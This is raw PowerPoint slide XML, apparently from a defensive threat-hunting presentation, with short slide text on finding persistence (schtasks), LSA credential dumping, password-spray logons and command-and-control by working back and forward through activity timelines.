            <a:xfrm rot="16200000">
              <a:off x="-217119" y="4234958"/>
              <a:ext cx="2150110"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Activity Level</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="TextBox 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D535EB-E573-954B-EFC8-3D1792AEFA08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1283444" y="5627365"/>
              <a:ext cx="910590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Time</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258AEAE4-FF81-D3AE-E69B-20DE6E6DAA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295461" y="3534232"/>
            <a:ext cx="0" cy="2532936"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Freeform 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A7CF0E-4601-33F0-AE88-C2355E57ED1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195158" y="3090088"/>
            <a:ext cx="8801100" cy="2543175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8801100"/>
              <a:gd name="connsiteY0" fmla="*/ 2543175 h 2543175"/>
              <a:gd name="connsiteX1" fmla="*/ 695325 w 8801100"/>
              <a:gd name="connsiteY1" fmla="*/ 1562100 h 2543175"/>
              <a:gd name="connsiteX2" fmla="*/ 1762125 w 8801100"/>
              <a:gd name="connsiteY2" fmla="*/ 2190750 h 2543175"/>
              <a:gd name="connsiteX3" fmla="*/ 3114675 w 8801100"/>
              <a:gd name="connsiteY3" fmla="*/ 923925 h 2543175"/>
              <a:gd name="connsiteX4" fmla="*/ 4371975 w 8801100"/>
              <a:gd name="connsiteY4" fmla="*/ 628650 h 2543175"/>
              <a:gd name="connsiteX5" fmla="*/ 5600700 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 304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371975 w 8801100"/>
              <a:gd name="connsiteY4" fmla="*/ 628650 h 2543175"/>
              <a:gd name="connsiteX5" fmla="*/ 5600700 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 304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371975 w 8801100"/>
              <a:gd name="connsiteY4" fmla="*/ 628650 h 2543175"/>
              <a:gd name="connsiteX5" fmla="*/ 5600700 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 304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00700 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 304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67375 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 40005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67375 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 40005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67375 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 40005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105150 w 8801100"/>
              <a:gd name="connsiteY3" fmla="*/ 1419225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105150 w 8801100"/>
              <a:gd name="connsiteY3" fmla="*/ 1419225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105150 w 8801100"/>
              <a:gd name="connsiteY3" fmla="*/ 1419225 h 2543175"/>
              <a:gd name="connsiteX4" fmla="*/ 4514850 w 8801100"/>
              <a:gd name="connsiteY4" fmla="*/ 1152525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105150 w 8801100"/>
              <a:gd name="connsiteY3" fmla="*/ 1419225 h 2543175"/>
              <a:gd name="connsiteX4" fmla="*/ 4514850 w 8801100"/>
              <a:gd name="connsiteY4" fmla="*/ 1152525 h 2543175"/>
              <a:gd name="connsiteX5" fmla="*/ 5476875 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 85725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2333625 w 8801100"/>
              <a:gd name="connsiteY3" fmla="*/ 1675686 h 2543175"/>
              <a:gd name="connsiteX4" fmla="*/ 3105150 w 8801100"/>
              <a:gd name="connsiteY4" fmla="*/ 1419225 h 2543175"/>
              <a:gd name="connsiteX5" fmla="*/ 4514850 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 1152525 h 2543175"/>
              <a:gd name="connsiteX6" fmla="*/ 5476875 w 8801100"/>
              <a:gd name="connsiteY6" fmla="*/ 857250 h 2543175"/>
              <a:gd name="connsiteX7" fmla="*/ 6276975 w 8801100"/>
              <a:gd name="connsiteY7" fmla="*/ 1866900 h 2543175"/>
              <a:gd name="connsiteX8" fmla="*/ 6534150 w 8801100"/>
              <a:gd name="connsiteY8" fmla="*/ 476250 h 2543175"/>
              <a:gd name="connsiteX9" fmla="*/ 6677025 w 8801100"/>
              <a:gd name="connsiteY9" fmla="*/ 1895475 h 2543175"/>
              <a:gd name="connsiteX10" fmla="*/ 6962775 w 8801100"/>
              <a:gd name="connsiteY10" fmla="*/ 304800 h 2543175"/>
              <a:gd name="connsiteX11" fmla="*/ 7277100 w 8801100"/>
              <a:gd name="connsiteY11" fmla="*/ 1885950 h 2543175"/>
              <a:gd name="connsiteX12" fmla="*/ 7381875 w 8801100"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 2543175"/>
              <a:gd name="connsiteX13" fmla="*/ 7639050 w 8801100"/>
              <a:gd name="connsiteY13" fmla="*/ 1581150 h 2543175"/>
              <a:gd name="connsiteX14" fmla="*/ 8048625 w 8801100"/>
              <a:gd name="connsiteY14" fmla="*/ 933450 h 2543175"/>
              <a:gd name="connsiteX15" fmla="*/ 8801100 w 8801100"/>
              <a:gd name="connsiteY15" fmla="*/ 2190750 h 2543175"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8801100"/>
              <a:gd name="connsiteY0" fmla="*/ 2543175 h 2543175"/>
              <a:gd name="connsiteX1" fmla="*/ 695325 w 8801100"/>
              <a:gd name="connsiteY1" fmla="*/ 1562100 h 2543175"/>
              <a:gd name="connsiteX2" fmla="*/ 1323975 w 8801100"/>
              <a:gd name="connsiteY2" fmla="*/ 1723311 h 2543175"/>
              <a:gd name="connsiteX3" fmla="*/ 1762125 w 8801100"/>
              <a:gd name="connsiteY3" fmla="*/ 2190750 h 2543175"/>
              <a:gd name="connsiteX4" fmla="*/ 2333625 w 8801100"/>
              <a:gd name="connsiteY4" fmla="*/ 1675686 h 2543175"/>
              <a:gd name="connsiteX5" fmla="*/ 3105150 w 8801100"/>
              <a:gd name="connsiteY5" fmla="*/ 1419225 h 2543175"/>
              <a:gd name="connsiteX6" fmla="*/ 4514850 w 8801100"/>
              <a:gd name="connsiteY6" fmla="*/ 1152525 h 2543175"/>
              <a:gd name="connsiteX7" fmla="*/ 5476875 w 8801100"/>
              <a:gd name="connsiteY7" fmla="*/ 857250 h 2543175"/>
              <a:gd name="connsiteX8" fmla="*/ 6276975 w 8801100"/>
              <a:gd name="connsiteY8" fmla="*/ 1866900 h 2543175"/>
              <a:gd name="connsiteX9" fmla="*/ 6534150 w 8801100"/>
              <a:gd name="connsiteY9" fmla="*/ 476250 h 2543175"/>
              <a:gd name="connsiteX10" fmla="*/ 6677025 w 8801100"/>
              <a:gd name="connsiteY10" fmla="*/ 1895475 h 2543175"/>
              <a:gd name="connsiteX11" fmla="*/ 6962775 w 8801100"/>
              <a:gd name="connsiteY11" fmla="*/ 304800 h 2543175"/>
              <a:gd name="connsiteX12" fmla="*/ 7277100 w 8801100"/>
              <a:gd name="connsiteY12" fmla="*/ 1885950 h 2543175"/>
              <a:gd name="connsiteX13" fmla="*/ 7381875 w 8801100"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 2543175"/>
              <a:gd name="connsiteX14" fmla="*/ 7639050 w 8801100"/>
              <a:gd name="connsiteY14" fmla="*/ 1581150 h 2543175"/>
              <a:gd name="connsiteX15" fmla="*/ 8048625 w 8801100"/>
              <a:gd name="connsiteY15" fmla="*/ 933450 h 2543175"/>
              <a:gd name="connsiteX16" fmla="*/ 8801100 w 8801100"/>
              <a:gd name="connsiteY16" fmla="*/ 2190750 h 2543175"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8801100"/>
              <a:gd name="connsiteY0" fmla="*/ 2543175 h 2543175"/>
              <a:gd name="connsiteX1" fmla="*/ 342900 w 8801100"/>
              <a:gd name="connsiteY1" fmla="*/ 1809036 h 2543175"/>
              <a:gd name="connsiteX2" fmla="*/ 695325 w 8801100"/>
              <a:gd name="connsiteY2" fmla="*/ 156210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77025 w 8801100"/>
              <a:gd name="connsiteY11" fmla="*/ 1895475 h 2543175"/>
              <a:gd name="connsiteX12" fmla="*/ 6962775 w 8801100"/>
              <a:gd name="connsiteY12" fmla="*/ 304800 h 2543175"/>
              <a:gd name="connsiteX13" fmla="*/ 7277100 w 8801100"/>
              <a:gd name="connsiteY13" fmla="*/ 1885950 h 2543175"/>
              <a:gd name="connsiteX14" fmla="*/ 7381875 w 8801100"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 2543175"/>
              <a:gd name="connsiteX15" fmla="*/ 7639050 w 8801100"/>
              <a:gd name="connsiteY15" fmla="*/ 1581150 h 2543175"/>
              <a:gd name="connsiteX16" fmla="*/ 8048625 w 8801100"/>
              <a:gd name="connsiteY16" fmla="*/ 933450 h 2543175"/>
              <a:gd name="connsiteX17" fmla="*/ 8801100 w 8801100"/>
              <a:gd name="connsiteY17"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77025 w 8801100"/>
              <a:gd name="connsiteY11" fmla="*/ 1895475 h 2543175"/>
              <a:gd name="connsiteX12" fmla="*/ 6962775 w 8801100"/>
              <a:gd name="connsiteY12" fmla="*/ 304800 h 2543175"/>
              <a:gd name="connsiteX13" fmla="*/ 7277100 w 8801100"/>
              <a:gd name="connsiteY13" fmla="*/ 1885950 h 2543175"/>
              <a:gd name="connsiteX14" fmla="*/ 7381875 w 8801100"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 2543175"/>
              <a:gd name="connsiteX15" fmla="*/ 7639050 w 8801100"/>
              <a:gd name="connsiteY15" fmla="*/ 1581150 h 2543175"/>
              <a:gd name="connsiteX16" fmla="*/ 8048625 w 8801100"/>
              <a:gd name="connsiteY16" fmla="*/ 933450 h 2543175"/>
              <a:gd name="connsiteX17" fmla="*/ 8801100 w 8801100"/>
              <a:gd name="connsiteY17"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77025 w 8801100"/>
              <a:gd name="connsiteY11" fmla="*/ 1895475 h 2543175"/>
              <a:gd name="connsiteX12" fmla="*/ 6962775 w 8801100"/>
              <a:gd name="connsiteY12" fmla="*/ 304800 h 2543175"/>
              <a:gd name="connsiteX13" fmla="*/ 7277100 w 8801100"/>
              <a:gd name="connsiteY13" fmla="*/ 1885950 h 2543175"/>
              <a:gd name="connsiteX14" fmla="*/ 7381875 w 8801100"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 2543175"/>
              <a:gd name="connsiteX15" fmla="*/ 7639050 w 8801100"/>
              <a:gd name="connsiteY15" fmla="*/ 1581150 h 2543175"/>
              <a:gd name="connsiteX16" fmla="*/ 8048625 w 8801100"/>
              <a:gd name="connsiteY16" fmla="*/ 933450 h 2543175"/>
              <a:gd name="connsiteX17" fmla="*/ 8801100 w 8801100"/>
              <a:gd name="connsiteY17"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01100" h="2543175">
                <a:moveTo>
                  <a:pt x="0" y="2543175"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="152400" y="2327037"/>
                  <a:pt x="190500" y="2025174"/>
                  <a:pt x="342900" y="1809036"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="752475" y="1619250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1012825" y="1622187"/>
                  <a:pt x="1158875" y="1625124"/>
                  <a:pt x="1323975" y="1723311"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1762125" y="2190750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1993900" y="2063512"/>
                  <a:pt x="2101850" y="1802924"/>
                  <a:pt x="2333625" y="1675686"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3105150" y="1419225"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4619625" y="1254125"/>
                  <a:pt x="4076700" y="1355725"/>
                  <a:pt x="4514850" y="1152525"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4889500" y="936625"/>
                  <a:pt x="5064125" y="939800"/>
                  <a:pt x="5476875" y="857250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5718175" y="993775"/>
                  <a:pt x="6073775" y="1377950"/>
                  <a:pt x="6276975" y="1866900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6362700" y="1403350"/>
                  <a:pt x="6315075" y="587375"/>
                  <a:pt x="6534150" y="476250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6543675" y="593487"/>
                  <a:pt x="6600825" y="548799"/>
                  <a:pt x="6667500" y="885111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6670675" y="1317149"/>
                  <a:pt x="6673850" y="1558687"/>
                  <a:pt x="6677025" y="1895475"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6772275" y="1365250"/>
                  <a:pt x="6848475" y="482600"/>
                  <a:pt x="6962775" y="304800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7067550" y="460375"/>
                  <a:pt x="7172325" y="1358900"/>
                  <a:pt x="7277100" y="1885950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7312025" y="1257300"/>
                  <a:pt x="7289800" y="219075"/>
                  <a:pt x="7381875" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7477125" y="174625"/>
                  <a:pt x="7543800" y="1397000"/>
                  <a:pt x="7639050" y="1581150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7775575" y="1365250"/>
                  <a:pt x="7912100" y="1016000"/>
                  <a:pt x="8048625" y="933450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8185150" y="1009650"/>
                  <a:pt x="8550275" y="1771650"/>
                  <a:pt x="8801100" y="2190750"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="505050">
                <a:lumMod val="50000"/>
              </a:srgbClr>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35134737-D8BD-A995-E9BF-B964CB64DA32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3605500" y="5260054"/>
            <a:ext cx="6308035" cy="1688340"/>
            <a:chOff x="1484245" y="1808922"/>
            <a:chExt cx="6308035" cy="1688340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81459B76-B7B4-9FA3-8520-48BD1DCB6491}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1484245" y="1808922"/>
              <a:ext cx="6308035" cy="1688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B72F904-977F-9EED-0A11-E81286B788E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1628425" y="2062064"/>
              <a:ext cx="2853986" cy="1231106"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Search for Persistence (schtasks.exe) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>and Credential Dumping</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>(LSA Process dump)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4BDF7AF-6972-B5C7-BDF3-8B376BD5684D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5560234" y="2062064"/>
              <a:ext cx="2232046" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Move forward to find current backdoors and C2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Right Arrow 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB891713-AFE5-B895-568E-5836D6FA8F6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4598468" y="2231295"/>
              <a:ext cx="814025" cy="277090"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C000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8BFD1AE6-854F-FB18-C5C6-7B2882CCC339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4178151" y="3603850"/>
            <a:ext cx="3421052" cy="364892"/>
            <a:chOff x="8658674" y="245344"/>
            <a:chExt cx="3421052" cy="364892"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rounded Rectangular Callout 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00983E1-5707-1360-48C9-FEC8476E838A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8658674" y="245344"/>
              <a:ext cx="2337584" cy="364892"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -868"/>
                <a:gd name="adj2" fmla="val 87261"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FCD116">
                <a:tint val="65000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FCD116"/>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Find here and look</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> forwards</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1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 name="Right Arrow 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622EB3C5-526F-315B-7AE8-C8542C309F68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10996258" y="291766"/>
              <a:ext cx="1083468" cy="304799"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C000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557259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1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E35EB-B3ED-44F6-A55F-40023145D42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FCB0D5-AC85-EA17-4AEC-562580DFB2A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5040983" y="2369404"/>
            <a:ext cx="6801197" cy="2252476"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Looking for failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inducing failure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Move attackers to more favorable terrain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bones of the Skeleton</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14403823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3CAB76-D9C0-10CC-7C70-C118B0DB39F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start with (Password Spray) Failure then look for Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C54E4D-D55B-F467-4AC4-D8F6C9B9F1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="600060" y="1271588"/>
            <a:ext cx="11556648" cy="2578517"/>
            <a:chOff x="600060" y="1271588"/>
            <a:chExt cx="11556648" cy="2578517"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8194" name="Picture 2" descr="Image">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A47BAB-6CBD-FFD6-1B7B-0C07DF9BC7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00060" y="1271588"/>
              <a:ext cx="11556648" cy="257851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3FFC313-2135-79AF-0004-B3ABC9381B00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2483317" y="2870181"/>
              <a:ext cx="1357163" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">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4EB38F-63D5-8D1B-ACA4-B4554153E71D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2550694" y="2157911"/>
              <a:ext cx="1357163" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">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5" name="Picture 2" descr="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{547FABC0-8372-7FD0-8006-19A8D14958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93592" y="2305753"/>
            <a:ext cx="9814476" cy="30887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ounded Rectangular Callout 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4714C6-5BC4-0F24-FAFA-86F3BA63DA3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2342473" y="5606816"/>
            <a:ext cx="3130768" cy="704138"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44591"/>
              <a:gd name="adj2" fmla="val -98614"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCD116">
              <a:tint val="65000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FCD116"/>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Segoe UI"/>
              </a:rPr>
              <a:t>Search for successful logons from known bad IPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4140744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8945-62F3-38D9-D805-F2C8C83CCD49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
